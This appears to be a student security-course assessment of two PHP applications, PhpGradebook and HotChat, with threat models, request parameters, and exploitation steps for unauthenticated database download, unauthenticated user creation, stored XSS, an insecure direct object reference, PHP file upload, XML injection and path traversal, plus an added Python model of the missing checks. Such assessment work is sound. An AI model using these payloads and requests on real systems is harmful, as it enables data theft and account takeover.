Scott Ning
SE 526 Assignment 2

Assessment of PhpGradebook

THREAT MODELING

Application Overview

The PhpGradebook application lets users such as students and administrators log in and view or enter grade information. The administration area exposes considerably more functionality for modifying that data, and therefore more inputs and outputs that may be vulnerable.

Interesting Areas

- The administrator dashboard offers database download and upload functions once an administrator has logged in.
  o These functions may be vulnerable in two ways: other file types could be uploaded to the same server/application, and the functions could be reachable without authentication.
    - By modifying POST/GET request parameters, a user may be able to change the file being uploaded and then access and execute that file on the server.
    - By calling this and the other database-modifying functions directly (through the URL, possibly with easily guessed POST/GET parameters) without the authentication cookies, an unauthenticated user may be able to retrieve the database contents.
- The administrator area edits information through many inputs, such as the text boxes in the grade-editing section.
  o These inputs may accept HTML and JavaScript that is saved directly to the database and later rendered, and thus executed, in other users' browsers wherever that data is displayed elsewhere in the application. A user may also be able to reach this functionality without logging in by sending requests with the appropriate parameters.
    - By storing malicious HTML and JavaScript, an attacker can cause other users to execute the script without their knowledge. This stored cross-site scripting can redirect users to an attacker's server, allowing the attacker to steal cookies or authentication information.
    - By calling this functionality directly through the appropriate URL and parameters without being authenticated, a user can modify data that they should not be allowed to access.
- A normal user (student) also has a few input/output areas. The main one is the view-grades page, which accepts a few parameters as input and displays grade data based on them.
  o Possible vulnerabilities are access to other data, or another user's data, by modifying the submitted parameters, and access to this functionality without authentication.
    - By modifying the POST/GET parameters while requesting the appropriate URL, a user may be able to read data they should not be able to access.
    - By calling this functionality through the appropriate URL and parameters without being authenticated, a user can view data that they should not be allowed to access.

VULNERABILITY CLASS IDENTIFICATION

Numerous vulnerabilities may exist within the PhpGradeBook application. Through source-based and black-box assessment, several vulnerability classes were identified. The relevant details for each class follow.

Remote File Inclusion / Unrestricted File Upload (uploading of malicious files/scripts)

Relevant source code: admin/index.php (lines 78 - 81 and 220 - 280)
POST request to URL: /phpGradeBook/admin/index.php?restore=sql
  o Assumed parameters:
    - "restore" with value "sql" (Type URL)
    - "adminuser" with the administrator's user name (Type Cookie)
    - "adminpass" with the administrator's hashed password (Type Cookie)
    - "uploadfile" with a modified value (for example the contents of a .gif file) to test whether other file types such as .txt, .html, .php, and .jpg can be uploaded (Type Body)

Insufficient Function Authorization (to retrieve/modify sensitive data)

Relevant source code: admin/index.php (lines 78 - 81 and 220 - 280)
POST request to URL: /phpGradeBook/admin/index.php?restore=sql
  o Test whether a database can be uploaded by requesting this URL directly without logging in (without the "adminuser" and "adminpass" cookies). Assumed parameters:
    - "restore" with value "sql" (Type URL)
    - "uploadfile" with the contents of a full SQL backup script, which can be produced by the database backup/download function (Type Body)

Relevant source code: admin/functions.inc.php (lines 1075 - 1105)
GET request to URL: /phpGradeBook/admin/index.php?action=SaveSQL
  o Test whether the database can be downloaded by requesting this URL directly without logging in (without the "adminuser" and "adminpass" cookies). Assumed parameter:
    - "action" with value "SaveSQL" (Type URL)

Relevant source code: admin/process.php (lines 127 - 142)
GET request to URL: /phpGradeBook/admin/process.php?action=AddStudent&name=testName&stud_id=testStudentId&password=testPass&class_name=SE%20526&notes=testNotes
  o Test whether a user can be created without administrator authentication. Assumed parameters:
    - "action" with value "AddStudent" (Type URL)
    - "name" with a value such as "testName" (Type URL)
    - "stud_id" with a value such as "testStudentId" (Type URL)
    - "password" with a value such as "testPass" (Type URL)
    - "class_name" with a value such as "SE%20526" (Type URL)
    - "notes" with a value such as "testNotes" (Type URL)

Cross-site Scripting (stored XSS/content injection)

Relevant source code: admin/index.php (lines 423 - 434)
POST request to URL: /phpGradeBook/admin/index.php?action=EditGrade
  o Test whether HTML is stripped from the submitted grade. Assumed parameters:
    - "action" with value "EditGrade" (Type URL)
    - "adminuser" with the administrator's user name (Type Cookie)
    - "adminpass" with the administrator's hashed password (Type Cookie)
    - "EditClass" with a value such as "SE+526" (Type Body)
    - "Student" with a value such as "Grade_1" (Type Body)
    - "EditGrade%5B%5D" (EditGrade[]) with a value containing HTML that triggers JavaScript, such as "%3Cimg+src%3D1+onerror%3Dalert%281%29%3E" (<img src=1 onerror=alert(1)>) (Type Body)
    - "EditGrade%5B%5D" with a value such as "20" (Type Body)
    - "EditGrade%5B%5D" with a value such as "40" (Type Body)
If the injection succeeds, check whether the stored value is rendered:
Relevant source code: index.php (lines 79 - 141)
POST request to URL: /phpGradeBook/index.php
  o Assumed parameters:
    - "class" with the same class that was attacked, such as "SE+526" (Type Body)
    - "action" with value "View+Class+Grades" (Type Body)

Insufficient Authentication (bypassing implicit security expectations by accessing restricted data with improper authentication: the student ID in the request body is trusted over the authenticated cookie, an insecure direct object reference)

Relevant source code: index.php (lines 79 - 141)
POST request to URL: /phpGradeBook/index.php
  o Assumed parameters:
    - "StudID" with the logged-in student's ID, such as "14112" (Type Cookie)
    - "StudPass" with the logged-in student's hashed password (Type Cookie)
    - "StudID" with another student's ID (Type Body)
    - "UseTerm" with an empty value (Type Body)
    - "action" with value "View+Class+Grades" (Type Body)
    - "class" with a value such as "SE+526" (Type Body)

VULNERABILITY EXPLOITATION

Based on the vulnerabilities identified above, exploitation was possible, giving an attacker access to the application's sensitive data and functionality. The procedures and the level of access gained are described below.
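The following Python model is an added example, not code from PhpGradebook or from this report. It shows the checks whose absence the four PhpGradebook classes above describe: an authorization gate in front of every admin action (SaveSQL, AddStudent, EditGrade), the student identity taken from the authenticated cookie rather than the request body, and output encoding of the stored grade so the EditGrade[] payload is rendered as text. The request shape (cookies and body as dicts), the credentials and the student table are constructed for the model; only the cookie names follow the report.

```python
"""Added model of the checks PhpGradebook lacks (not the application's code).
Requests are (cookies, body) dicts; credentials and records are constructed."""
import hashlib
import hmac
import html

# Constructed sample data. The real cookies carry an unsalted MD5; the hash
# choice does not matter for the authorization point, so SHA-256 is used here.
ADMIN_USER = "admin"
ADMIN_PASS_HASH = hashlib.sha256(b"example-admin-pass").hexdigest()
STUDENTS = {  # StudID -> [password hash, {class name: grade}]
    "14112": [hashlib.sha256(b"pass-14112").hexdigest(), {"SE 526": "90"}],
    "11214": [hashlib.sha256(b"pass-11214").hexdigest(), {"SE 526": "75"}],
}


def _same(a, b):
    """Constant-time comparison of two cookie/hash strings."""
    return hmac.compare_digest(a.encode(), b.encode())


def is_admin(cookies):
    """Gate that admin/index.php and admin/process.php must apply before any
    action (SaveSQL, AddStudent, EditGrade, restore=sql). Missing cookies fail closed."""
    return (cookies.get("adminuser", "") == ADMIN_USER
            and _same(cookies.get("adminpass", ""), ADMIN_PASS_HASH))


def handle_admin(action, cookies, body):
    """Admin dispatch with the authorization check done first.
    Returns (status, message) in the shape of an HTTP response."""
    if not is_admin(cookies):
        return 403, "administrator login required"
    if action == "SaveSQL":
        return 200, "database dump"
    if action == "AddStudent":
        pw_hash = hashlib.sha256(body["password"].encode()).hexdigest()
        STUDENTS[body["stud_id"]] = [pw_hash, {}]
        return 200, "student %s created" % body["stud_id"]
    return 404, "unknown action"


def authenticated_student(cookies):
    """StudID proven by the StudID/StudPass cookies, or None."""
    stud_id = cookies.get("StudID", "")
    record = STUDENTS.get(stud_id)
    if record and _same(cookies.get("StudPass", ""), record[0]):
        return stud_id
    return None


def render_grade(value):
    """Output encoding for the grade cell on index.php: the stored payload
    <img src=1 onerror=alert(1)> is emitted as inert text."""
    return html.escape(value, quote=True)


def view_student_grades(cookies, body, trust_body=False):
    """index.php "View Student Grades". trust_body=True reproduces the
    Insufficient Authentication finding (the body's StudID chooses whose grades
    are shown); the default derives the target from the authenticated cookie."""
    me = authenticated_student(cookies)
    if me is None:
        return 401, {}
    target = body.get("StudID", me) if trust_body else me
    class_name = body.get("class", "").replace("+", " ")
    grade = STUDENTS.get(target, [None, {}])[1].get(class_name, "")
    return 200, {"StudID": target, class_name: render_grade(grade)}


def admin_cookies():
    """Cookies a legitimately logged-in administrator would present."""
    return {"adminuser": ADMIN_USER, "adminpass": ADMIN_PASS_HASH}


def student_cookies(stud_id, password):
    """Cookies a legitimately logged-in student would present."""
    return {"StudID": stud_id,
            "StudPass": hashlib.sha256(password.encode()).hexdigest()}


if __name__ == "__main__":
    print(handle_admin("SaveSQL", {}, {}))
    body = {"StudID": "11214", "UseTerm": "", "class": "SE+526"}
    print(view_student_grades(student_cookies("14112", "pass-14112"), body))
    print(render_grade("<img src=1 onerror=alert(1)>"))
```

The model keeps the application's scheme of a password hash in a cookie so that the missing check is the only difference; a real fix would replace that scheme with a server-side session, but the gate and the cookie-derived identity are what each of the identified requests is missing.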
Insufficient Function Authorization

As outlined in the identification section, downloading the database is fully exploitable with the exact GET request and parameter specified there.

Access Gained: Read the application's database without authentication, exposing sensitive data such as user information and passwords.

Steps:
1. Request the URL "/phpGradeBook/admin/index.php?action=SaveSQL" from the browser.
2. The database is downloaded.

Similarly, creating a user without authentication is also exploitable.

Access Gained: Create a user account, which should only be possible from the administrator area, without authentication.

Steps:
1. Request the URL, with the new user's details in the query string, "/phpGradeBook/admin/process.php?action=AddStudent&name=testName&stud_id=testStudentId&password=testPass&class_name=SE%20526&notes=testNotes" from the browser.
2. The page responds with a success message indicating that the user was created.

Cross-site Scripting

Access Gained: Injection of JavaScript that executes in any user's browser without their knowledge. This can be used to redirect users to an attacker's server and steal cookies or session/authentication information, with which the attacker can log in to the account, change the password, and take over the account.

Steps:
1. Request the URL "/phpGradeBook/admin/" from the browser.
2. Log in as an administrator:
   a. "Admin Name" = admin and "Admin Pass" = superadminpass, or
   b. Create valid authentication cookies "adminuser" and "adminpass". (The values can be taken from the database downloaded in the previous exploit: adminuser="admin" and adminpass="21232f297a57a5a743894a0e4a801fc3".)
3. Request the URL "/phpGradeBook/admin/index.php?action=ViewAllGrades" from the browser.
4. Enter JavaScript such as "<img src=1 onerror=alert(1)>" in a student's grade text box (the text box with name="EditGrade[]").
5. Click the "Commit Edit" button for that student.
6. Request the URL "/phpGradeBook/index.php" from the browser.
7. Click the "View Class Grades" button with the modified class selected.
8. Confirm that the JavaScript executes; in this case, check that the alert is shown.
   a. This application's cookies are accessible to JavaScript.

Note: The first five steps can be replaced by a single POST request to "/phpGradeBook/admin/index.php?action=EditGrade" with the exact parameters listed in the identification section.

Insufficient Authentication

Access Gained: View another user's detailed grade information (data that should only be viewable when logged in as that user).

Steps:
1. As outlined in the identification section, send a POST request to the URL "/phpGradeBook/index.php" with the following parameters:
   a. Type=Cookie, Name=StudID, Value=14112
   b. Type=Cookie, Name=StudPass, Value=a029d0df84eb5549c641e04a9ef389e5
   c. Type=Body, Name=StudID, Value=<another user's ID, such as "11214">
   d. Type=Body, Name=UseTerm, empty value
   e. Type=Body, Name=action, Value=View+Student+Grades
   f. Type=Body, Name=Class, Value=SE+526
2. Confirm that the other student's detailed grade information is shown.

Assessment of HotChat

THREAT MODELING

Application Overview

The HotChat application lets users upload a custom emoticon image and chat under a chosen nickname in a chosen room. These inputs, and the file upload in particular, are well-known sources of vulnerabilities.

Interesting Areas

- The homepage allows an emoticon image file (assumed to be a .gif) to be uploaded.
  o This may allow any file type to be uploaded and then accessed. An attacker who can upload arbitrary files can upload and run malicious scripts, such as PHP code, that read or modify data. Such scripts are effectively a backdoor giving the attacker extensive control over the application.
- XML files populated from user input are used to store chat messages.
  o XML injection is possible because user input is written into these files. By supplying malicious data through query strings, POST or GET parameters, or text boxes, a user can insert arbitrary content into the XML files, storing bogus data and potentially making the file invalid XML.
- The application stores user nickname information in .hc files that any user can view.
  o Because these files are created or modified from user-supplied requests, they may be created in unexpected directories on the server. An attacker who controls both the file name and the content (the nickname) written to it can create the file in other directories and insert malicious text into it.

VULNERABILITY IDENTIFICATION

Remote File Inclusion / Unrestricted File Upload

Relevant source code: cadastra_sigla.php (lines 31 - 62)
POST request to URL: /hotchat/cadastra_sigla.php
  o Assumed parameters:
    - "sigla" with a value such as "test" (Type Body)
    - "imagem" with a modified value containing a malicious file (such as the contents of a PHP script) to test whether other file types can be uploaded (Type Body)
If the upload succeeds, check whether the file is reachable:
Relevant source code: index.php (lines 79 - 141)
GET request to URL: /hotchat/chats/emoticons/MaliciouslyUploadedFile.php
GET request to URL: /hotchat/chats/emoticons/ (to check whether the directory listing is viewable)

XML Injection

Relevant source code: index.php (lines 64 - 71)
GET request to URL: /hotchat/cadastra.php?nick_escritor=</NICK><SCOTT>hacked</SCOTT><NICK>&frase_escritor=chatText&room_escritor=someRoomXmlFileThatExistsInTheChatDirectory
  o Assumed parameters:
    - "nick_escritor" with the tags and data to inject, in this case "%3C/NICK%3E%3CSCOTT%3Ehacked%3C/SCOTT%3E%3CNICK%3E" (Type URL)
    - "frase_escritor" with a value such as "chatText" (Type URL)
    - "room_escritor" with a value such as "someRoomXmlFileThatExistsInTheChatDirectory" (Type URL)

Path Traversal

Relevant source code: index.php (lines 9 - 17 and 45 - 50)
GET request to URL: /hotchat/chat_users.php?nick=testNick&room=../test&operation=testOperation
  o Assumed parameters:
    - "nick" with the text to be written to the file, such as "testNick" (Type URL)
    - "room" with a malicious file name including directory traversal, such as "../test" (Type URL)
    - "operation" with value "testOperation" (Type URL)

VULNERABILITY EXPLOITATION

Remote File Inclusion / Unrestricted File Upload

Access Gained: The ability to upload any file type lets an attacker upload and run malicious scripts that read or modify data. Such scripts are effectively a backdoor giving the attacker extensive control over the entire application; the attacker can also upload a web shell and execute system commands through it.

Steps:
1. Request the URL "/hotchat/cadastra_sigla.php" from the browser.
2. Enter "test" in the "Text:" text box.
3. Click the "Choose File" button and select a local PHP file such as "test.php".
4. Click the "Send!" button.
5. Request the URL "/hotchat/chats/emoticons/" from the browser.
6. Confirm that the file was uploaded and exists on the server by finding it in the directory listing.
7. Execute/view the script by requesting the URL "/hotchat/chats/emoticons/test.php" from the browser.

XML Injection

Access Gained: Attackers can insert malicious data into the XML files, injecting bogus data and potentially making the file invalid. When the application or its users read the file, they retrieve erroneous information or, if the file has become invalid, encounter errors.

Steps:
1. Request the URL "/hotchat/cadastra.php?nick_escritor=</NICK><SCOTT>hacked</SCOTT><NICK>&frase_escritor=chatText&room_escritor=someRoomXmlFileThatExistsInTheChatDirectory" from the browser.
   a. Or send a GET request to "/hotchat/cadastra.php" with the following parameters:
      i. "nick_escritor" with value "%3C/NICK%3E%3CSCOTT%3Ehacked%3C/SCOTT%3E%3CNICK%3E" (Type URL)
      ii. "frase_escritor" with value "chatText" (Type URL)
      iii. "room_escritor" with value "someRoomXmlFileThatExistsInTheChatDirectory" (Type URL)
2. Confirm that the injected tags and data, "<SCOTT>hacked</SCOTT>", appear in the returned page and in the XML file.
   a. The XML file can be opened in the browser at "/hotchat/chats/someRoomXmlFileThatExistsInTheChatDirectory.xml".

Path Traversal

Access Gained: Attackers can create a file with arbitrary content in an unintended directory on the server.

Steps:
1. Request the URL "/hotchat/chat_users.php?nick=testNick&room=../test&operation=testOperation" from the browser.
   a. Or send a GET request to "/hotchat/chat_users.php" with the following parameters:
      i. "nick" with value "testNick" (Type URL)
      ii. "room" with value "../test" (Type URL)
      iii. "operation" with value "testOperation" (Type URL)
2. Confirm that the new file exists in the unintended directory by requesting "/hotchat/test_users.hc" from the browser.
3. Confirm that the content "testNick" is present in that file as displayed in the browser.